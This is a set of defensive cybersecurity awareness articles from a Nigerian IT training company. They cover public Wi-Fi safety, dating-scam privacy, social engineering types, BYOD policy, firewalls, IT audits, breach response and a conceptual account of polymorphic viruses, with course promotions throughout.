  1. Accessing Sensitive information using public Wi-Fi: I will as a matter of fact always advice anyone never to use public Wi-Fi’s to access their sensitive information. If there is need at any point in time to access your sensitive data online, you need to switch you’re your local ISP or get someone to pretty much share their device hotspot with you. You can do use the public Wi-Fi to browse for things like directions and other things that are less sensitive like getting information from google, bing or yahoo. If you’re trying to process things like paying of bills or even shop online, these things can wait. If it is an urgent situation which you need to achieve, the use of a VPN (Virtual Private Network) is advised. There is a plethora of trusted VPNs online and obviously if you need a good service, then you need to pay for such VPNs. Ensure you choose a reputable VPN security provider.
  2. Use VPNs (Virtual Private Network): If there is a need to use a publicly available Wi-Fi to do your work and your company or organisation offers a VPN access, ensure to make use of it. VPNs provide a private tunnel for you to transmit or communicate by adding an extra layer of security for your connection.
  3. Visit HTTPS only: If you are using a public Wi-Fi, ensure to avoid websites that are HTTP (not protected or secure) and visit or browse websites that begin with HTTPS.

Why am I saying so, if you are an IT expert, you not, you must know that HTTPS are encrypted and provide an extra layer of security which makes browsing more secure. If you connect to an HTTP site which is unsecure, a hacker can easily see your traffic if he snoops around the network.

 

 

  1. Consider installing an extension such as HTTPS-Everywhere in order to re-route all the websites you visit to HTTPS. There is a tool offered by the Electronic Fronteir Foundation which provides this option.

2.Configure wireless settings on your device: Configure your device not to connect automatically to any available Wi-Fi hotspots. This can be done by navigating to the wireless settings of your PC or device. This setting makes sure your device does not automatically and unknowingly gets connected to any public network. On your PC, just turn off the “connect automatically” option. When you do this, you prevent your device from broadcasting to the world that it is attempting to get connected to the “home network” which a hacker can easily spoof.

  1. Use Privacy screens: Hackers are everywhere and are usually not afraid of using any means possible to access and obtain your data, you must consider making use of privacy screens if there is a need to access sensitive information in a public place.

In general terms, whether or not you are using a your smart-devices or PC’s to access some sensitive information like accessing your bank account and financial information, always ensure not to do it in a publicly available Wi-Fi network. Ensure to consider all the tips above to keep your information protected online.

Soutech ventures offers a comprehensive information security course such as (CEH and CISSP) which can give more security insights, tools/tips and countermeasures in the different facets of technology. Subscribe to our services today.

Certified Ethical Hacking Training in Abuja,Nigeria

Online Dating: Protect your privacy online-SOUTECH Cyber security Tips

In the past 3years, Nigerian singles have flocked dating sites and took to social media to employ their services in searching for partners. Online dating has outgrown all the stigma it used to have in the past as a research by psychologist and counsellors have found that one out of ten Nigerian single person has veered on to social media and online dating sites on their mobile apps and PC’s to get hooked up with people. Since the negative stigma attached to the online dating has gradually been phased out and nearly going into extinction, the popularity of these services has been on the rise and has caught the attention of hackers and scammers.

Recently in Nigeria, a lot of hackers and scammers have taken to social media platforms to trick people into giving sensitive and personal information. I have a made a personal study on this and from reading experiences from people and it has become of concern for me the reason behind this article. Apart from phishing scams and other vices that hackers have adopted to take advantage of unsuspecting victims, online dating has become one of the tools of meeting the emotions of people to exploit them.

The intention of this article is not to talk about dating and online dating or its sort but to give you tips on how to protect your privacy online.

Privacy Protection Tips

Creating of new user accounts

Create a username different from any other account that you have ever had and used. Now you may be wondering why you should do this, this is because a username can be searched easily and any account related to it, so this is the reason why you usually need a totally different account.

Images and photos uploaded

The same applies to photos and the images that you post on your social media profiles. You should try as much as possible to make sure that any reverse image searches performed on you will not work.

Opening Email accounts

Ensure to setup a free email account to use on the dating accounts with a unique name. Note that most sites provide features that offer users anonymity protection via their own in-site messaging products.

Using Free Google voice accounts for Calls

If you must do a phone call, open a free google voice account that will generate a different phone number for you and then go ahead to forward it to your mobile. By doing this, you have been able to secure your phone number that will enough to give you your potential match.

Use Reputable Online Dating sites

Always research properly and subscribe to popular and reputable online dating sites if you must use them. You can either delete or disable an account which come sites actually allow you. And since the site retains your previous information, you can always return to the online dating sites whenever.

Check website privacy policies

Ensure to check the sites privacy policies and try to verify how information with these sites are being handled. Some of these sites by default make profile pictures and profiles public which can be easily indexed by any search engine. There is a popular website that was penalized recently for secretly trying to experiment with their user’s data.

The fact that users have to pay to use their services for communication, this has reduced the rate of scammers and illegitimate daters. Note that some of these sites perform background screenings for criminals.

How can online dating scams be spotted?

Now that you have known some of the do’s and don’ts of the social online dating sites, now I will teach us how to spot any form of scams that you may be exposed to know.

  • I have heard people say someone comes up to them with some stories to get to their emotions. Now this is one popular trick by scammers in that an individual can add up and start giving you some sad stories like “ I am stranded in a foreign country at the moment, my family has an emergency and needs immediate attention”. The endpoint of this story is request for some amount of money from you. Once you see this, immediately report such accounts to the service and do well to block such.
  • Another trick I apply is to request a recent photo of the person I am chatting with in order to verify their identity. If in anyway they come up excuses or start a sort of protest as to the know why they won’t be able to provide the photo, the best thing to do is to run for safety and apply caution at once.
  • If you been chatting with and familiarizing a supposed sweetheart for some time and you observe that they avoid any real-life meetings and dates, this could be a warning signal to take note of.
  • Do not click open any links that is sent to you by anyone you have not been chatting or communicating with as well as from the ones you’re in frequent chats with. A scammer can appear to be a contact and try to get you to click the links which may redirect you to a pornographic site or webcam site and even malware infected sites.
  • Be careful about your behavior and your outfit if you want to engage in any sort of webcam or video chat. A criminal will want to record these sorts of sessions in order to blackmail you with it. You can disconnect from any form of communication or chat sessions that makes you uncomfortable.
  • Scammers use bots to create fake profiles that run their accounts with the aim of getting you to click these links that redirect you to unwanted sites described above. Some of them can even be programmed to steal your credit card information. Well, you can easily spot a bot because they are programmed to give out a set of predetermined responses. When you observe that you are not getting direct replies to your conversation, then there are chances that a bot has been set in.

CatFishing

The term catfishing is a scamming trick in which a user takes the identity of another person. This scamming has been adopted by scammers and cyber criminals to lure people into online romantic relationships and friendships.

A typical catfisher will always come up with excuses as to why they can’t have dates, call you in phone or even do video and webcam chats. It probably is true if the user’s profile appears too real that a lie. What you can do is to perform a reverse online image search of their photo and if they seem to be a place which is different from the one showing in their profiles then congratulations you have been able to catch a catfish.

As a parting word, we are in the age and era of the internet where we can order just anything from online. And as it is in all facets of life to have scammers and tricksters, scammers and hackers are in strong search of loopholes to exploit online users. But I have and will always do my bit in keep u appraised with all the techniques they can possibly come with to trick you. All you have to do is subscribe to all the tips I have given out in this article and you can safely be online and keep your relationships going on just fine.

Subscribing to our CEH course in Soutech ventures gives you an added edge to stay one step ahead of hackers and cyber criminals all over the world.

 

What is Social Engineering? Protect Yourself and Organization from all forms of Social Engineering-SOUTECH Nigeria

Vulnerabilities in softwares have been widely discussed and looking at it from the human perspective, human emotions play a large part. Anytime someone is faced with a scary or frightening scenario, their first reaction to it matters a whole lot.

Social engineers leverage on this type of vulnerability to launch successful attacks on victims. I am going to discuss in details what social engineering is all about and its different forms as this particular vulnerability stands at 80% when it comes to the techniques which cybercriminals perpetrate attacks.

What is Social Engineering?

Social engineering is a technique whereby cybercriminals make use of human interactions to trick users into giving out sensitive information such as personal credentials.

Types of Social Engineering

The fact that social engineering leverages on the human nature and emotions to perpetrate, attackers have deployed many techniques to trick users both online and offline. Here are a few techniques you should know about;

Phishing:

Phishing is one of the oldest cyber tricks and has been grown to be one of the most popular most successful means of exploiting computer users. In phishing, cybercriminals usually attempt many tricks and methods to get information from you. Recently, they have resorted to using scare tactics which can come in form of an urgent situation which requires your attention usually having to do with your banking details or your other online accounts. Users therefore will have to make decisions based on fear and how they feel at the time the scenario is simulated.

Emails that seem to be from a legitimate authority such as your financial institution or your company will be sent to you requesting your username or password in order to get login access. Normally, people tend to react to when issues involving their finances or jobs are involved especially when it appears to come from a higher management. I will reiterate that one major phishing tactic is in the sense of urgency applied to these messages.  I have written comprehensively on the forms and techniques of phishing so you can look it up. Read more on phishing

Baiting

Now let’s look at this technique which involves cybercriminals leaving a malware-infected USB or external devices in a public or open place. They leverage on the curious nature of humans such that when someone out of curiosity picks up this device and plugs it onto their computer systems in order to see what information is on it. Once they do this, the malware automatically gets injected into their computers.

Pretexting

In pretexting, the cybercriminal fabricates some very emotional stories and scenarios that tend to get to the emotions of their victims. Sometimes the stories can come in form stories of being stranded in a foreign country and sometimes can be that they are princes or princesses in their countries and their Father just passed away. They then try to tell the victim to please help them with a sum of 500USD or more in order to take back the throne. Like I said, these type of scenario tends to get to the emotions of victims who may always want to help. Pretexting is used alongside other methods as most of the techniques are targeted towards getting to the emotions of the victim or the cybercriminal attempts to impersonate someone on the telephone.

Hacking Emails and Spamming of Contacts

It is in the human nature to be inclined towards the affairs of their family and people they seem to know. For example, if my brother sends me an email message that comes with a subject that says “Look up this website, you may find something of interest” I normally wouldn’t resist checking it out by clicking open. Now this is the reason why a cybercriminal will try to leverage on this technique by using emails addresses and passwords. Immediately the victim’s personal credentials are obtained by the cybercriminal, they are take total control of the users account and will further more spam all the contacts that are on the users’ list. Always remember that the main objective of this attack vector is to spread malware with the desire of tricking people into giving out their personal data.

Vishing

This technique of all the methods mentioned so far and beyond involves the most of human interactions. In vishing, the cybercriminal puts a call through to an employee of an organisation faking to be a trusted individual to the organisation. They can pose to be a representative from the bank or other highly profiled company’s related to the organisation of the victim proposing to do a business with them.

Their aim is to try to get as much information as possible from the victims. They can even pose to be a fellow employee with a lost or misplaced password and request for their passwords and may try to sound legitimate by asking questions to verify the identity of the victim.

Quid Pro Quo

This is also referred to as something-for-something. This technique involves attempting to entice users with winning prizes, products or getting discounts on purchase of expensive products. This scam is fashioned such that the users can only get something only after they have completed a form which requires mostly your personal data. The information gathered can then be used to perpetrate other attacks such as identity theft etc.

Spear Phishing

This is a technique that is related largely related to phishing and can be referred to as phishing’s complex cousin. In spear phishing, the cybercriminal targets the employees of an organisation and does some reconnaissance on them online with the aim of getting personal information.

Information can be gotten from internet searches and social media platforms via profiles. Once they have been able to get details personal to them, they can then start sending emails that may seem very necessary and of interest to them in order to entice them. Such that once they click the links sent to them, the malware file attached can be downloaded to their system. Once the cybercriminal successfully tricks the user, the malware is installed on the user’s computer which can be spread throughout the network to other computers on the company network.

Farming

This is more like a long-con where the cybercriminal tries to establish a relationship with a target. They usually go through their targets social media profiles in order to establish a relationship and gather as much as information that will help them perform an attack.

This attack form typically depends on pretexting because the attackers aim is to have prolonged conversations with the target in order to extract as much information as possible.

Hunting

This is a shorter version of all the attack forms. The cybercriminal will typically use baiting, phishing and email hacking to extract information from a chosen target passively (i.e. with no direct contact or with little interaction as possible).

Social engineering has taken over all forms, both online and offline and therefore has become very difficult to control or cut off its threats. Therefore, your best defense mechanism against social engineering is to educate yourself and your employees if you run an IT-driven organisation. You should also be aware and lookout for any possible attack methods that may come.

We have a comprehensive course that can help you learn more on how to protect yourself from social engineering and other attack forms. Subscribe to our CEH course today in SOUTECH.

Setting up a Bring-Your-Own-Device (BYOD) policy for your Organization- Be Cyber-safe-SOUTECH

In a recent survey by Symantec, it said that about three to four small and medium-sized organization owners have adopted smartphones and tablets as a core part of achieving their teams’ success. Since the use of these devices are gradually expanding, therefore there is a need to provide an apt security for them. This is the main reason why organizations have adopted the bring-you-own-device concept an approach that is commonly referred to as BYOD.

The fact that smartphones and tablets have grown into consumer markets have made a lot of employees choose employ the Bring-Your-Own-Device concept to their places of work. So, I’ll be giving you a few tips on how to stay protected on the internet as mobile devices have become a core entity in many organizations.

Therefore, the idea of developing a sound and efficient BYOD policy that can assist in gaining a maximum productivity in your organization or your company.

These are a few things I will buttress on this point which are the necessities for every organization;

1.Assessing the needs of Your BYOD 

One of the key things you can do is to brief or engage your employees and staff in talks regarding the use of their devices in the organization for business transactions. The things you need to find out are;

  • Do they access the company server and read emails related to work or the business?
  • What operating systems and the devices they employees use in order to access their network?

This information will guide your policies and help you to dictate the scope of your policies and the measures you can take to secure your devices. It can also help you to in making choices of the security softwares you can deploy to protect their devices.

2. Always Educate Your Employees

Endeavour to talk to your employees and team members on the potential risks of using mobile devices in and out of the office including the importance of managing these any related risk. It must be made compulsory for employees to follow security best practices, which include:

  • Employing the use of complex passwords for their devices and for any program that is related to work which are accessed using those devices.

                                 

These passwords can be set by navigating through the device’s settings. Learn more about creating strong passwords.

  • Employing a regular password changing policy. For example, changing passwords quarterly or every 90days. You can use password manager services like KeePass or LastPass which is capable of helping employees manage multiple and regular password changes.
  • Always ensuring that system updates and app updates are done once the device prompts for them. This is done in order to protect against any possible security vulnerabilities.
  • Being on the lookout for phishing text messages and emails which can be avoided by avoiding to click on such links that prompt them to download files and documents from unknown pages.
  • Doing a thorough research on applications before having to download them unto devices. Employees should be discouraged from downloading applications from unofficial or third-party app stores.

3. Strong Protective measures must be implement

Products that will assist employees to build their strength and ability of their devices when used for business should be explored. A very good tool is the Norton Small Business software that performs the function of protecting mobile devices against malwares associated with mobiles.Research has had it that many devices running on Android platforms carry potential malwares and privacy loopholes and greywares which are capable of hindering productivity. However, there have been new products that provide more security including remote locate and lock and wipe features. These features allow mobile users to manage their device security from a central web portal. Consider using a VPN (Virtual Private Network) service if the employees access the company’s network remotely with their mobile devices. A VPN creates a tunnel that is encrypted in the internet which allows traffic to pass through it. There are mobile apps that allow users to connect to a VPN via their mobile devices or smartphones.

4. Acceptable Use should be properly defined

Guidelines should be outlined to clarify and define how employees can use their devices during business hours for business purposes. For instance, you may employ a pervasive policy by allowing your team members to access documents and emails, but prohibiting them having access to sensitive files such as financial data. Websites and apps that are prohibited from accessing with the company VPN during work hours should be specified.

5. Decide how these Guidelines are Enforced

Setup due consequences for any member of your team who goes against any of the outlined policies. Measures could be that if anyone accesses those prohibited apps or softwares during business hours it could result in warning and if anyone downloads or stores confidential files from a malicious app, such persons will not get funding for their mobile devices.

These measures should be outlined clearly with how any potential violations will be handled.

If you run a business or an organisation that encourages the BYOD policy, thinking through these steps and few tips should be able to guide you through building a firm foundation and an effective way to manage your infrastructure and protect it from any possible security breaches.

You can learn about a lot of more tips on how to better manage your infrastructure along proper auditing skills from SOUTECH ventures. We offer the best IT consulting solutions to our clients in Abuja, Lagos and Port Harcourt. Subscribe to our Ethical hacking course and learn more.

 

Protect your Infrastructure-Know the Importance of Firewalls : SOUTECH Cyber security training program Nigeria, Africa

A firewall just as its name implies is a protective barrier whose function is more like a physical firewall. The firewall lies just between the computer and the connection it has with the internet to provide protection from any form of online threats.

A firewall is a software program or a piece of hardware device that is programmed to provide security for your computer by placing limitations on information that you can receive from an external network. A firewall is designed to either allow or block information coming in or out of a network based on certain security policies.

The term firewall came into the cybersecurity world as a borrowed term from the word firefighting where an effort is made to prevent the spread of fire.

Organizations actually started moving from the use of mainframe computers and dumb clients in a client-server model and therefore the need to put a control over the server became a top priority. Before the introduction of firewalls in the late 80’s, the only form of protection from the outside world was the use of Access control lists (ACLs) resident in routers. The function of the ACLs was to choose which IP address to grant or deny access to a certain network.

Due to the swift growth of the internet and increased rate of connectivity of people and organizations to networks, it gradually meant an end of the ACL as a filtering method which was not enough to keep of malicious traffic. This was so because basic about network traffic was embedded in the packet header. The first organization to deploy the use of firewalls to tackle the threat of cyberattacks was the Digital equipment Corp (DEC) in 1992.

 

Types of Firewall Techniques

  • Packet Filter Firewalls: This type of firewall handles the packets going in or out of the network based on pre-defined rules by the user. The packet filtering ability is fairly transparent and effective to users however can be difficult to configure. It is however very susceptible to IP spoofing.
  • Application gateway Firewalls: This type of firewall applies security configurations  to specific applications like the Telnet and FTP servers. The application gateway firewall is very effective but can impose some performance degradations.

  • Circuit-level Gateway firewalls: This firewall type applies its security configurations when a TCP or UDP connection has been established. Therefore, once this connection is established, the packets begin to flow between the hosts without any further verification.

  • Proxy Server Firewalls: This firewall type intercepts all the messages that go in and out of the network. The proxy server firewall cascades or hides the real network address of the host.

 

The benefits of a firewall

  • It prevents any unauthorized user from an external network from gaining access to your internal network i.e. your computer in your network.
  • It monitors all forms communications that goes on between your computer and other computers outside of you network and over the internet.

  • It establishes a protective shield that either allows or blocks any attempt to access data or information on your computer.
  • It sends out a warning when any other computer tries to connect to you.
  • It also warns against any illegitimate connection by an application on your computer that gives access to other computers.

The Limitations of a Firewall

Firewalls however have not been able to determine the contents of email messages that are sent to your computer so they cannot you from malware sent through phished emails.

So therefore:

  • The need for antivirus softwares that can detect, quarantine or delete suspicious email attachments
  • Learn to protect yourself from phishing scams

If you have a private network, ensure that you protect your devices by configuring the firewall settings on your computers and wireless router. You can also add an extra level of security to your personal computers by using security softwares. However, even if your wireless network may seem secure, it may not be secure from other types of malware that can be gotten from computers through the internet.

Build your firewalls such that it can defend you against hackers and viruses. You can do this by always ensuring that your firewall is turned on. You can configure the firewall settings in the security and privacy section which can be found under your systems preferences section.

Also ensure to do regular updates of your anti-virus software as an extra security measure. Please note that firewalls and anti-viruses are not the same thing

Finally, asides the protection a firewall offers you, learn safe online practices.

If you need to learn about firewall configurations, and purchase latest and licensed anti-virus softwares contact us at soutech ventures. Subscribe to us today for all types of IT trainings and consultations you may require.

Understanding the importance of an IT audit: SOUTECH Ethical hacking tips

An IT audit is an audit that deals with the review and evaluation of all automated and non-automated information processing systems and all the interfaces that it encompasses. It also includes setting up management controls for information technology and infrastructures.

The elementary function of IT audits includes, evaluation of systems that are already in place to guard the organization’s information. It looks into the ability of an organization to protect its assets as well as be able to legitimately and adequately give out information to authorized parties.

The process of planning IT audits involves two key steps

  • Gathering information and planning
  • Gaining an understanding of the already existing internal control structures

Many organizations are gradually phasing towards the approach of risk-based audits which is used for risk assessment and to help the IT auditor to decide on whether to carry out a compliance and substantive test. The risk based approach involves the IT auditors relying on the internal and operational controls and also the knowledge of the organization involved.

However, this type of decision as regards risk assessment can go a long way to relate the profits analysis of the control to the risk.

These are the 5 aspects that an  IT auditor needs to identify when gathering information:

  • Good knowledge of the business and industry
  • Previous results obtained from all the years
  • Recent financial data
  • Already existing standards and policies
  • Inherent risk assessments

Inherent risk here refers to the risk that there is an error that could be a function of combined errors that are encountered during this audit assuming there are no controls in place.

Once the auditor has gathered relevant information and has an understanding of the control, then they are ready to start planning or select areas that need auditing.

Why is it important to do an IT Audit?

Hardly will you find an organization in recent times that is not IT driven. A lot of organisations today are investing huge amounts of cash on their IT infrastructure because they have come to realize the tremendous importance of using IT in their business services and operations. As a result of this, they need to always make sure that their IT systems are very secure, very reliable and is not susceptible or vulnerable to any form of cyber attacks.

The importance if an IT audit can never be over emphasized because it provides the assurance that the IT systems deployed by the organization is well protected, is available at all times, properly managed to get the required results and that it gives out reliable information to users. Many people use and rely on IT without knowing how it works and that a computer can make errors repeatedly and incurring extensive damages than a human being can. An IT audit is also very important in reducing risk of data leakage, data losses, service disruptions and ill-management of an IT infrastructure.

The Objectives of an IT audit

The objectives of an IT audit often focus on substantiating that the existing internal controls and are functioning as expected in order to minimize business risk. The objectives include

  • Assuring compliance with legal and regulatory standards
  • Ensuring confidentiality
  • Ensuring Integrity
  • Improving availability of information systems

Confidentiality here relates to information security and refers to protecting information from being disclosed to unauthorized persons or parties. This means that information such as personal credentials, trade secrets, bank account statements are kept confidential and protecting this information plays a major role in information security.

The fact that information is valuable only when it has not been tampered with gives way to data integrity such that information is not modified by an unauthorized party. If information is inappropriately altered, it could prove costly for example, a transaction of 1000naira can be altered to 10,000naira. Making sure data is protected from being tampered with is a core aspect of information security.

Availability here means that information is made available to authorized individuals whenever it is needed. Unfortunately, the act of denying rights to resources to rightful users has been in on the rise lately. An information systems audit will therefore ensure confidentiality of an organizations data, data integrity and availability of resources. An IT audit therefore oversees the organizations IT systems, its operations and management processes.

The reliability of data from an IT system can as well have huge impact on the financial statements of an organization. There an IT audit must be able to

  • Check for instances of excesses, gross inefficiencies, extravagance which has to do with wastage of resources in the management of IT systems
  • Ensure that there is a high level of compliance with government laws as applicable to the IT system.

Types of IT audits

Different bodies and authorities have developed their views to distinguish the types of IT audits. Goodman and Lawless have outlined three systematic approaches to perform IT audits

  • Technological Innovation Process Audit: This audit type attempts to construct a risk profile for already existing as well as new projects. It assesses the length, depth and presence of the technologies used by the company and how it relates to the relevant markets. It also looks into the way each project is organized, the structure of industry as regards its projects, products etc.
  • Technological position audit: This audit type deals with the technologies that the business has on ground and what it needs to add to it. Technologies can be categorized into
    • Base
    • Key
    • Pacing
    • Emerging
  • Innovative Comparison Audit: This audit deals with the analysis of the innovative capabilities of the organization being audited when compared to its competitors and rivals. The company’s research and development facilities as well as its track record of producing new products will be examined.

Other authorities have also categorized IT audits in 5 spectrum

  • Information Processing Facilities: It is focused on verifying the processing ability of the facility and if it is designed under normal and disruptive conditions to process applications in a timely, accurate and efficient way.
  • Systems and Applications: It is focused on verifying systems activity are controlled appropriately, efficiently and adequately in order to ensure its output at all levels are valid, reliable, and timely. This audit type forms a sub-type that focuses on business IT systems and also focuses on financial auditors.
  • Management of IT and Enterprise Architecture: IT focuses on verifying that organizational structure and procedure that ensures a controlled and efficient information processing environment is developed by the IT management.
  • Systems Development: This audit verifies the systems that are under the process of development meet the requirements and objectives of the organization. It also ensures that the systems are developed in line with generally accepted policies and standards for systems development.
  • Client/Server, Intranets, extranets and Telecommunications: This audit verifies that the controls for telecommunications are in place both the client and the server ends as well as the network that connects both the clients and servers.

Types of Auditors

  • Internal Auditor: This auditor usually performs internal accounts auditing as well as IS audits.
  • External Auditor: This auditor reviews the findings and inputs, processes and outputs of the information systems made by the internal auditor.

Types of Audits

  • Internal Audits: As explained above, an internal audit considers all the potential controls and hazards in an information system. It takes care if issues like operations, data, data integrity, security, privacy, software applications, productivity, expenditures, cost control and budgets. The auditor works with guidelines such as Information systems audit and control association which are available to make their job patterned.
  • External Audits: This audits buttresses on information obtained from internal audits on information systems. External audit is performed by an certified information systems audit expert.

IT Audit Strategies

  1. We’ll discuss two areas here but first one must be able to determine if it is a compliance or substantive testing. The next thing to consider is how to go about gathering evidences to enable one perform application audits and make reports to the management.

What is substantive and Compliance Testing?

  • Compliance testing involves gathering evidence to test if an organization is following the control procedures. For example, If an organization has a control procedure that says all application changes have to pass through a change control, an IT auditor will have to get the current running configurations of the router as well as the configuration file. After he does this, he can then run a file to compare the differences and use the result of the differences to look for a supporting change control documentation.

  • Substantive Testing involves gathering evidence that enables one evaluate the data integrity of individual data and other information. For example, If an organization has a policy that has to do with backup tapes in storage locations offsite which includes three generations (Grandfather, father and son), then the IS auditor has to take physical inventory of the tapes in an offsite storage location as well. After this he can then compare it with the organizations inventory and also making sure the three generations are involved and are available at the time of the audit.
  1. The thing to discuss on is How to get the evidence that can help you audit the application and deliver a report to management. A few things you can review are;
  • Review the IT organizational structure
  • Review the IT policies and procedures
  • Review the IT standards
  • Review the IT documentations
  • Review the organizations BIA
  • Take time to interview employees
  • Observe the employee’s performance
  • Test controls and examine necessary incorporated entities
  1. Draft out a set of questionnaires
  • Whether there is a thorough documentation of approved IS audit guideline?
  • Whether IS audit guidelines are consistent with the security policy?
  • Whether responsibilities for the IT audit has been assigned to a separate unit that is independent of  the IT department?
  • Whether periodic external IS audit is carried out?
  • Whether independent security audit is conducted periodically?
  • Whether contingency planning, insurance of assets, data integrity etc. are made part of External audit?
  • Whether vulnerability and penetration testing were made part of external audit?
  • Whether the major concerns brought out by previous Audit Reports have been highlighted and brought to the notice of the Top Management?
  • Whether necessary corrective action has been taken to the satisfaction of the Management?
  • Whether the facilities for conducting trainings which will enable IS audit teams to conduct the audit process effectively?
  • Whether IS audit team is encouraged to keep themselves updated?
  • Whether IS auditors exchange their views and share their experiences internally?

Operations is modern organizations  are increasing dependent on IT, this is why IT audits are used to make sure that all information-related controls and methods are functioning properly. Most of all the companies if not all are IT driven and not enough awareness has been made on auditing of IT infrastructure the reason for this write up. If you’re in search of a professional firm to audit your organization, look no more as soutech web consults which is the number one IT consulting firms offers in Nigeria offers this service. Subscribe to us for your auditing and all types of IT-related issues.

 

Has your account just been hacked? Wondering what to do next?

Just recently it was in the news that over 7million Dropbox usernames and passwords were being stolen with initial reports that the Dropbox server itself was hacked. The company made this statement on their blog as quoted “The usernames and passwords and passwords that are referenced in these articles were stolen from unrelated services and not Dropbox. Attackers however, went further more to use the stolen credentials to attempt log in into our websites across the internet, including Dropbox”.

Stories and news of data and network breaches in organizational networks have become trending on every headline recently so regardless of where the loopholes are, it is something we hear frequently. So many highly profiled businesses that we interact with regularly such as restaurants, product retailers have had POS (Point of Sale) data breaches over the past months.

However, I will tell you a few tips on how to approach a data breach situation and some things you can put in place in case you’re faced by such situations.

What to do Immediately- First Things First

  • First of all, try to determine the form of data breach that your information has been involved in. If it is an online data breach, then there is a possibility that your username and password might have been stolen, and if it is a POS data breach then it means your credit card numbers have been stolen as well.

  • Now if it is a POS data breach from a product outlet or a store, a restaurant that you have just purchased something with, then immediately check your credit card credentials and bank details for any suspicious activity.
  • Lookout for any alerts from the vendors that you use such that immediately a vulnerable vendor has contacted customers of password change, the user should do so too.
  • Avoid any potential phishing email or emails that require you update your password and private information via email. One tip you should always look out for is to check the email id or web address to confirm it is the official email or web address of your financial institution.
  • You can also change your other passwords if you use the same password over several accounts particularly the ones linked to your email account and those that contain your private and financial information. I advise you to go through you bank and credit card accounts as well.
  • Always notify you financial institution whenever you receive any suspicious activity going on as regards your financial account. Make sure you let them know the breached institution which your credit was used. They can take immediate action by blocking any transaction to that account.

 Meanwhile in the Interim

  • Continue to keep a close eye on you bank or financial accounts. You could also subscribe for receiving transaction alerts via text and emails. It is policy now for every bank provide these services. Sometimes it may seem that you are now safe but a cybercriminal has patience has a key virtue and therefore may take months to make use of your stolen bank and financial information.
  • You might as well contact the company which the data breach occurred when you did your transaction. They can provide you with information as regards the type of information that was leaked and the policies they have put in place to keep your personal details protected.

In the Long run

  • A lot of businesses or organisations have developed a policy such that any customer that gets affected by a data breach is given a free year of data monitoring. You can also find out with the organisation if they have such policies or if they such services.
  • I still lay emphasis on the use of a secure password coupled with a two-factor authentication as explained in my previous articles to be a key online safety means.

Data breaches however continue to be most frequent incidents these days like I said, there are ways to stay alert and be protected at all times. Luckily, if there are purchases you have made, there are anti-fraud laws in place to ensure your safety. If you find yourself in the clutch of any of the data breaches, be diligent enough to monitor your accounts. Soutech web consultants are just the right professionals to handle to fears. If you in anyway become a victim of sort, you can contact us at SOUTECH. Also, if you take all the methods and tips mentioned in this article and as long as you report any suspicious fraudulent activity then you are just as well informed as ever.

 

All you need to know about Polymorphic Viruses

Polymorphic viruses have over the years been one of the most difficult and complex viruses to detect. Anti-virus manufacturing companies have had to spend days and months trying to create detection routines required to track a single polymorphic.

I’ll attempt to discuss about polymorphics and some of the detection mechanisms existing and also introducing Symantec’s striker Technology, a patent-pending mechanism for detection of polymorphics.

The Norton anti-virus 2.0 was the maiden version to include a striker for possible detection of polymorphics.

 The Evolution of Polymorphic viruses

A computer virus can be defined as a self-replicating computer program that functions without the permission of the user. In order to spread, it attaches a copy of itself to some part of the program such as a word processor or a spreadsheet. A virus can also attack boot records and master boot records that contain all the information that a computer needs to startup.

Some viruses can replicate themselves, some may display messages input by its creator, some can be designed to deliver a part of a payload to corrupt programs, delete files, reformat a hard-disk drive, shutdown or crash a corporate network. I will quickly discuss about some viruses before we can relate it to polymorphic viruses.

Simple Virus

All a simple virus does is to replicate itself such that if a user launches the program, the virus gains control of the computer and attaches a copy of itself to other program files. After it spreads successfully, the virus transfers control back to the host program, which functions normally. You can perform a simple anti-virus scan to detect this kind of infections.

Encrypted Virus

The mode of operation of the encrypted virus was via signatures. Its idea was to hide the fixed signatures by scrambling the virus therefore making it unrecognizable by the virus scanner.

An encrypted virus is made up of a virus decryption routine as well as an encrypted virus body such that if the user launches the infected program, the virus decryption routine first gains control of the computer, then decrypts the body of the virus.

                                            An Encrypted Virus

Polymorphic viruses

The polymorphic virus is built in such a way that it has a scrambled virus body and a decryption routine that first gains control and then decrypts the virus’ body. However, it possesses a third component which is a mutation engine that sort of generates randomized decryption routines which change each time the virus infects a new program.

The mutation engine and the virus body are both encrypted such that when a user runs a program infected with a polymorphic virus, the decryption routine first gains control of the computer, then decrypts both the virus body and the mutation engine.

                             An Encrypted Virus before execution

 

                                 An Encrypted Virus after Execution

The decryption routine then transfers control of the computer to the virus, which locates a new program to infect. At this point, the virus makes a copy of both itself and the mutation engine in random access memory (RAM). The next thing the virus does is that it invokes the mutation engine, which will randomly generate a new decryption routine that will decrypt the virus and yet does not bear any resemblance to the previous decryption routine. The virus encrypts the new copy of the virus’ body and the mutation engine. Finally, the virus then attaches this new decryption routine, alongside the newly encrypted virus and mutation engine to the new program.

Decrypt virus

                                                      A Fully decrypted Virus

So, we can see that not only is the virus’ body encrypted, but the decryption routine varies from infection to infection. This therefore confounds a virus scanner searching for the tell-tale sequence of bytes that identifies

a specific decryption routine. With a signature that is not fixed to scan for, and a non-fixed decryption routine as well, no two infections look alike.

Detecting a Polymorphic Virus

Anti-virus researchers launched an attempt to fight back by developing special detection routines crafted to detect and catch each and every polymorphic virus. Special programs were written by line for line which were designed to detect various sequences of computer codes known to be used by all the mutation engines to decrypt the virus body.

This approach was not feasible, it was as well time consuming and costly. Every new polymorphic virus needs its own detection program and also, a mutation engine which produces seemingly random programs which can properly execute decryption and some mutation engines to generate billions of variations.

Moreover, a lot of polymorphics make use of the same mutation engine, credits to the authors of viruses like dark avenger. In addition to this, different engines are being used by different polymorphics to generate a similar decryption routine, which can make identification of the virus solely based on decryption routines wholly unreliable.

This approach can be misleading by identifying one polymorphic as another. These shortcomings led anti-virus researchers to develop generic decryption techniques that trick a polymorphic virus into decrypting and revealing itself.

To gain more knowledge about all forms of malwares with malware analytical skills subscribe to our CEH course at Soutech Ventures. We have trained and seasoned experts to give you both theoretical and hands-on ethical hacking knowledge and skills.

Network Penetration Testing Services: Tools and Methodologies

In my previous articles, I have discussed intensively on vulnerability analysis and penetration testing but I’ll reiterate a few things to help buttress the points in this article.

Penetration plays a major role in the playbook of any security consultant and penetration test and it is the best clue to know how vulnerable a network is to an attack. Compliances such as PCI and HIPAA require vulnerability assessment and they also enable penetration testing to be performed smartly and in a targeted form when compared to performing simple port scans. Vulnerability assessments most importantly is the bedrock for developing an information security program that is proactive, going beyond reactive techniques such as starting firewalls and identifying loopholes and making attempts to seal them. But know this, that when installing and managing your websites and networks even if you might know much about the basic security measures and even follow them, it is never enough to discover and mitigate all the vulnerabilities by yourself.

